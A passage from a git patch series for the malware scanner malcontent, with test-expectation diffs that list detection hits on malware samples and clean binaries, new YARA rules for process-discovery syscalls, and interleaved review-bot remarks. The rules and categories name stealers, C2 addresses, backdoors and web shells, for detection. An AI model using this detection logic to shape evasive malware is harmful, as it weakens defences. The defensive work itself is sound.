[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | +| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | +| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | +| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | +| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | +| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | +| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | +| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | +| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | +| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | 
[/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | +| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple index 887baac34..1864ab728 100644 --- a/tests/linux/clean/tracer.o.aarch64.simple +++ b/tests/linux/clean/tracer.o.aarch64.simple @@ -4,7 +4,6 @@ collect/databases/mysql: medium discover/network/netstat: medium evasion/bypass_security/linux/iptables: medium evasion/logging/acct: low -evasion/process_injection/ptrace: low impact/remote_access/heartbeat: medium net/http/post: medium net/ip/multicast_send: low diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple index 948f3b110..c75e6ce7c 100644 --- a/tests/linux/clean/trivy.simple +++ b/tests/linux/clean/trivy.simple @@ -66,7 +66,6 @@ evasion/file/location/chdir_unusual: medium evasion/file/location/dev_shm: medium evasion/file/location/var_run: medium evasion/file/prefix: medium -evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/symbol_address: medium diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index 29b2837f7..939d68075 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff 
@@ -7,7 +7,6 @@ | -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| -LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | ## Added: ls [🔵 LOW] diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index be1dfc59f..9e0e93a9c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -3,7 +3,6 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read --hw/dev/ubi -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index be1dfc59f..9e0e93a9c 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -3,7 +3,6 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read --hw/dev/ubi -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/php/2024.sagsooz/2024.php.simple b/tests/php/2024.sagsooz/2024.php.simple index 3789511f5..2bc7487d9 100644 --- a/tests/php/2024.sagsooz/2024.php.simple +++ b/tests/php/2024.sagsooz/2024.php.simple @@ -5,7 +5,7 @@ data/base64/decode: medium data/embedded/base64_url: medium data/embedded/html: medium data/encoding/base64: low -discover/process/effective_groupid_get: medium +discover/process/egid: medium evasion/indicator_blocking/mask_exceptions: medium evasion/time/php_no_limit: medium exec/shell/command: medium diff --git a/tests/python/2021.DiscordSafety/setup.py.simple b/tests/python/2021.DiscordSafety/setup.py.simple index b6ef8b6f4..32765505a 100644 --- a/tests/python/2021.DiscordSafety/setup.py.simple +++ b/tests/python/2021.DiscordSafety/setup.py.simple @@ -2,7 +2,7 @@ anti-static/obfuscation/hex: medium anti-static/obfuscation/python: critical anti-static/unmarshal/marshal: high -c2/addr/url: medium +c2/addr/url: high collect/databases/leveldb: medium data/encoding/base64: low data/encoding/marshal: medium diff --git a/tests/python/clean/numpy/misc_util.py.simple b/tests/python/clean/numpy/misc_util.py.simple index 8ccb1207f..6907bcce7 100644 
--- a/tests/python/clean/numpy/misc_util.py.simple +++ b/tests/python/clean/numpy/misc_util.py.simple @@ -18,7 +18,6 @@ fs/path/usr_lib_python: medium fs/path/usr_local: medium fs/symlink_resolve: low fs/tempdir/create: low -hw/dev/ubi: low net/ip/spoof: medium net/url/embedded: low os/env/get: low diff --git a/tests/python/clean/versioneer/versioneer.py.simple b/tests/python/clean/versioneer/versioneer.py.simple index b075018d3..08ebb2614 100644 --- a/tests/python/clean/versioneer/versioneer.py.simple +++ b/tests/python/clean/versioneer/versioneer.py.simple @@ -6,5 +6,4 @@ data/embedded/base64_url: medium data/encoding/base64: low fs/file/open: low fs/path/usr_bin: low -hw/dev/ubi: low os/fd/write: low diff --git a/tests/windows/2024.aspdasdksa2/creal.exe.simple b/tests/windows/2024.aspdasdksa2/creal.exe.simple index 13c24270f..d6c10054b 100644 --- a/tests/windows/2024.aspdasdksa2/creal.exe.simple +++ b/tests/windows/2024.aspdasdksa2/creal.exe.simple @@ -9,7 +9,6 @@ data/compression/lzma: low data/embedded/app_manifest: medium data/encoding/base64: low discover/system/sysinfo: medium -evasion/process_injection/ptrace: low exec/program: medium exec/tty/getpass: low exfil/stealer/python: critical From bcb169d93312713938f5e9c91d21e467712b69b8 Mon Sep 17 00:00:00 2001 
From: Thomas Stromberg
Date: Sun, 10 Nov 2024 08:37:26 -0500
Subject: [PATCH 5/7] Renamed rules
---
 rules/discover/process/egid.yara | 27 +++++++++++++++++++
 rules/discover/process/euid.yara | 12 +++++++++
 rules/discover/process/pid.yara | 13 +++++++++
 rules/discover/process/priority.yara | 11 ++++++++
 rules/discover/process/resource-limits.yara | 13 +++++++++
 rules/discover/process/uid.yara | 12 +++++++++
 rules/discover/process/working_directory.yara | 24 +++++++++++++++++
 7 files changed, 112 insertions(+)
 create mode 100644 rules/discover/process/egid.yara
 create mode 100644 rules/discover/process/euid.yara
 create mode 100644 rules/discover/process/pid.yara
 create mode 100644 rules/discover/process/priority.yara
 create mode 100644 rules/discover/process/resource-limits.yara
 create mode 100644 rules/discover/process/uid.yara
 create mode 100644 rules/discover/process/working_directory.yara
diff --git a/rules/discover/process/egid.yara b/rules/discover/process/egid.yara
new file mode 100644
index 000000000..65139d4ed
--- /dev/null
+++ b/rules/discover/process/egid.yara
@@ -0,0 +1,27 @@
+rule getegid: harmless {
+ meta:
+ syscall = "getegid"
+ description = "returns the effective group id of the current process"
+
+ strings:
+ $getuid = "getegid" fullword
+ $Getuid = "Getegid" fullword
+
+ condition:
+ any of them
+}
+
+rule php_getmygid: medium {
+ meta:
+ syscall = "getegid"
+ description = "returns the effective group id of the current process"
+ hash_2023_0xShell_0xShellori = "506e12e4ce1359ffab46038c4bf83d3ab443b7c5db0d5c8f3ad05340cb09c38e"
+ hash_2023_0xShell_root = "3baa3bfaa6ed78e853828f147c3747d818590faee5eecef67748209dd3d92afb"
+ hash_2023_0xShell_wesoori = "bab1040a9e569d7bf693ac907948a09323c5f7e7005012f7b75b5c1b2ced10ad"
+
+ strings:
+ $getmygid = "getmygid"
+
+ condition:
+ any of them
+}
diff --git a/rules/discover/process/euid.yara b/rules/discover/process/euid.yara
new file mode 100644
index 000000000..e3baa0a8c
--- /dev/null
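Review bot: The string identifiers in `rule getegid` are named `$getuid`/`$Getuid` although they match `getegid`/`Getegid`, which misreads in a match report and looks copy-pasted from uid.yara; the geteuid rule in euid.yara has the same mismatch. Rename them to `$getegid`/`$Getegid` here and `$geteuid`/`$Geteuid` there. In `rule php_getmygid`, `$getmygid = "getmygid"` is the only pattern in these new files without `fullword`; adding it keeps the medium-severity rule from matching identifiers that merely contain the token.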
+++ b/rules/discover/process/euid.yara
@@ -0,0 +1,12 @@
+rule geteuid: harmless {
+ meta:
+ syscall = "geteuid"
+ description = "returns the effective user id of the current process"
+
+ strings:
+ $getuid = "geteuid" fullword
+ $Getuid = "Geteuid" fullword
+
+ condition:
+ any of them
+}
diff --git a/rules/discover/process/pid.yara b/rules/discover/process/pid.yara
new file mode 100644
index 000000000..5c2b72256
--- /dev/null
+++ b/rules/discover/process/pid.yara
@@ -0,0 +1,13 @@
+rule getpid: harmless {
+ meta:
+ syscall = "getpid"
+ description = "gets the active process ID"
+
+ strings:
+ $ref = "getpid" fullword
+ $Getpid = "Getpid" fullword
+ $procID = "processID" fullword
+
+ condition:
+ any of them
+}
diff --git a/rules/discover/process/priority.yara b/rules/discover/process/priority.yara
new file mode 100644
index 000000000..722ac201e
--- /dev/null
+++ b/rules/discover/process/priority.yara
@@ -0,0 +1,11 @@
+rule getpriority: harmless {
+ meta:
+ syscall = "getpriority"
+ pledge = "proc"
+
+ strings:
+ $ref = "getpriority" fullword
+
+ condition:
+ any of them
+}
diff --git a/rules/discover/process/resource-limits.yara b/rules/discover/process/resource-limits.yara
new file mode 100644
index 000000000..80f6c2193
--- /dev/null
+++ b/rules/discover/process/resource-limits.yara
@@ -0,0 +1,13 @@
+rule getrlimit: harmless {
+ meta:
+ syscall = "getrlimit"
+ description = "retrieve resource limits"
+ pledge = "id"
+
+ strings:
+ $ref = "getrlimit" fullword
+ $go = "Getrlimit" fullword
+
+ condition:
+ any of them
+}
diff --git a/rules/discover/process/uid.yara b/rules/discover/process/uid.yara
new file mode 100644
index 000000000..ca7fa609b
--- /dev/null
+++ b/rules/discover/process/uid.yara
@@ -0,0 +1,12 @@
+rule getuid: harmless {
+ meta:
+ syscall = "getuid"
+ description = "returns the user id of the current process"
+
+ strings:
+ $getuid = "getuid" fullword
+ $Getuid = "Getuid" fullword
+
+ condition:
+ any of them
+}
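Review bot: `rule getpriority` has no `description` meta, so a report line for it carries only the rule name, whereas the other rules in this patch (getegid, geteuid, getpid, getrlimit, getuid) describe themselves; `rule getcwd` and `rule getwd` in working_directory.yara have the same gap. Add `description = "gets the scheduling priority of a process"` here and equivalents there. The `pledge` values (`"proc"` here, `"id"` for getrlimit) are presumably taken from pledge(2); worth confirming, since nothing else in the rule corroborates them.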
diff --git a/rules/discover/process/working_directory.yara b/rules/discover/process/working_directory.yara
new file mode 100644
index 000000000..32276c274
--- /dev/null
+++ b/rules/discover/process/working_directory.yara
@@ -0,0 +1,24 @@
+rule getcwd: harmless {
+ meta:
+ pledge = "rpath"
+ syscall = "getcwd"
+
+ strings:
+ $getcwd = "getcwd" fullword
+
+ condition:
+ any of them
+}
+
+rule getwd: harmless {
+ meta:
+ pledge = "rpath"
+ syscall = "getwd"
+
+ strings:
+ $getwd = "getwd" fullword
+ $go_Getwd = "Getwd" fullword
+
+ condition:
+ any of them
+}
From 565c199b6f813aa4068653f8b5be6224023fecb5 Mon Sep 17 00:00:00 2001
From: Thomas Stromberg Date: Sun, 10 Nov 2024 11:45:58 -0500 Subject: [PATCH 6/7] rule tuning --- pkg/action/testdata/scan_archive | 5 +- rules/c2/addr/url.yara | 12 ++-- rules/data/embedded/embedded-base64-elf.yara | 10 ++++ .../system_network.yara => multiple.yara} | 0 rules/discover/network/connectivity.yara | 11 ++++ .../{interface-get.yara => interface.yara} | 0 rules/discover/process/name.yara | 2 +- .../system/{cpu-info.yara => cpu.yara} | 0 rules/discover/system/dev_full.yara | 2 +- rules/discover/system/dmesg.yara | 10 ++++ .../{hardware-info.yara => hardware.yara} | 0 .../{hostname-get.yara => hostname.yara} | 0 ...{hostinfo_collector.yara => multiple.yara} | 0 rules/evasion/file/attr/chflags.yara | 11 ++++ rules/evasion/file/location/multiple.yara | 19 ++++++ .../indicator_blocking/hidden_window.yara | 54 ++++++++++++++++++ rules/evasion/logging/dmesg.yara | 13 +++++ .../{linux_kernel.yara => kernel.yara} | 0 rules/evasion/rootkit/posix_userspace.yara | 12 ---- .../{linux_userspace.yara => userspace.yara} | 13 +++++ rules/exec/program/hidden.yara | 2 +- rules/impact/remote_access/backdoor.yara | 2 +- rules/impact/remote_access/botnet.yara | 9 +-- rules/net/dns/dns-over-https.yara | 1 + rules/net/ip/spoof.yara | 5 +- rules/persist/cron/echo_crontab.yara | 12 ---- rules/persist/cron/etc_cron_d.yara | 12 ++++ rules/persist/cron/hidden_crontab.yara | 17 ------ rules/persist/cron/{crontab.yara => tab.yara} | 32 ++++++++++- .../{module-load.yara => insert.yara} | 46 +++++++++------ rules/persist/kernel_module/module.yara | 20 ++++++- rules/sus/geopolitics.yara | 9 +++ rules/sus/malicious.yara | 3 +- tests/does-nothing/does-nothing.simple | 4 +- .../2022.an-instance.99.10.9/index.js.simple | 2 +- .../clean/203.b7219352.chunk.js.simple | 1 + ...4796BB27126E03A7E25DD5D589.cache.js.simple | 2 +- ...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 2 +- tests/javascript/clean/bash.js.simple | 3 +- .../javascript/clean/highlight.esm.js.simple | 2 +- 
tests/javascript/clean/highlight.js.simple | 2 +- tests/javascript/clean/mode-php.js.simple | 2 +- .../clean/mode-php_laravel_blade.js.simple | 2 +- tests/javascript/clean/php.js.simple | 2 +- tests/javascript/clean/prism-bash.js.simple | 3 +- .../javascript/clean/prism-bash.min.js.simple | 3 +- .../clean/scripts.c88fecd373e21509.js.simple | 3 +- tests/linux/2021.FontOnLake/45E9.elf.simple | 9 +-- tests/linux/2021.XMR-Stak/1b1a56.elf.simple | 4 +- .../2022.Symbiote/kerneldev.so.bkp.simple | 2 +- tests/linux/2022.ez-pwnkit/payload.simple | 4 +- .../freedownloadmanager.sdiff | 5 +- tests/linux/2023.Kinsing/install.sh.simple | 1 + .../eight-nebraska-autumn-illinois.simple | 8 +-- .../uranus-ack-mike-cat.simple | 4 +- tests/linux/2024.chisel/crondx.simple | 4 +- ...4084b7471bc5aed1c81803054f017240a72.simple | 4 +- tests/linux/2024.gas/gas.simple | 4 +- .../emp3r0r.agent.simple | 6 +- .../2024.kworker_pretenders/gafgyt.simple | 2 + tests/linux/2024.medusa/rkload.simple | 6 +- tests/linux/clean/appsec-rules.json.simple | 3 +- tests/linux/clean/busybox.simple | 5 +- tests/linux/clean/caddy.simple | 4 +- tests/linux/clean/chezmoi.simple | 4 +- tests/linux/clean/chrome.simple | 2 +- tests/linux/clean/clickhouse.simple | 9 +-- tests/linux/clean/code-oss.md | 8 +-- tests/linux/clean/containerd.simple | 5 +- tests/linux/clean/cpack.md | 6 +- tests/linux/clean/default_config.json.simple | 3 +- ...f01-4f43-a872-605b678968b0_111.json.simple | 2 +- .../kibana/securitySolution.chunk.9.js.simple | 3 +- tests/linux/clean/kuma-cp.simple | 5 +- tests/linux/clean/ld-2.27.so.simple | 2 +- tests/linux/clean/libgcj.so.17.0.0.simple | 4 +- tests/linux/clean/libgcj.so.17.simple | 4 +- tests/linux/clean/ls.x86_64.md | 16 +++--- tests/linux/clean/melange.simple | 5 +- .../linux/clean/misp_sample.ndjson.log.simple | 4 +- tests/linux/clean/mongosh.simple | 4 +- tests/linux/clean/opa.simple | 4 +- tests/linux/clean/pandoc.md | 7 ++- tests/linux/clean/ping.x86_64.md | 4 +- 
tests/linux/clean/pulumi.simple | 4 +- .../clean/pypi_package_index.json.simple | 2 +- tests/linux/clean/qemu-system-xtensa.md | 1 + tests/linux/clean/rules.json.simple | 3 +- tests/linux/clean/searchindex.json.simple | 4 +- tests/linux/clean/slack.md | 4 +- tests/linux/clean/slirp4netns.simple | 2 +- tests/linux/clean/sudo.simple | 4 +- tests/linux/clean/trivy.simple | 5 +- tests/linux/clean/trufflehog.md | 6 +- tests/linux/clean/wolfictl.simple | 5 +- .../2023.3CX/libffmpeg.change_decrease.mdiff | Bin 39788 -> 39788 bytes .../2023.3CX/libffmpeg.change_increase.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.decrease.mdiff | Bin 39788 -> 39788 bytes tests/macOS/2023.3CX/libffmpeg.dirty.mdiff | 2 +- tests/macOS/2023.3CX/libffmpeg.increase.mdiff | 2 +- .../2024.BeaverTail/client_5346.py.simple | 1 + tests/macOS/2024.Ezuri/libdpt1.so.simple | 2 +- tests/macOS/2024.LightSpy/dropper.simple | 4 +- tests/macOS/2024.Rustdoor/localfile.simple | 11 ++-- .../macOS/2024.cobaltstrike/EDnFsVAEbP.simple | 2 +- tests/macOS/clean/ls.mdiff | 16 +++--- tests/macOS/clean/ls.sdiff.trigger_2 | 2 +- tests/macOS/clean/ls.sdiff.trigger_3 | 2 +- tests/npm/2024.harthat/deference.js.simple | 2 +- .../package.json.simple | 2 +- .../2024.next-react-notify/tocall.js.simple | 2 +- .../2024.persona-tool/preinstall.js.simple | 2 +- tests/php/clean/composer-2.7.7.simple | 2 +- .../valyrian_debug_setup.py.simple | 2 +- tests/python/2023.JokerSpy/shared.dat.simple | 2 +- tests/python/2024.Custom.RAT/output.py.simple | 2 +- .../2024.GitHub.Clipper/main.exe.simple | 2 +- .../windows/2024.GitHub.Clipper/raw.py.simple | 3 +- .../windows/2024.aspdasdksa2/creal.pyc.simple | 2 +- .../Swashbuckle.AspNetCore.ReDoc.dll.simple | 1 + 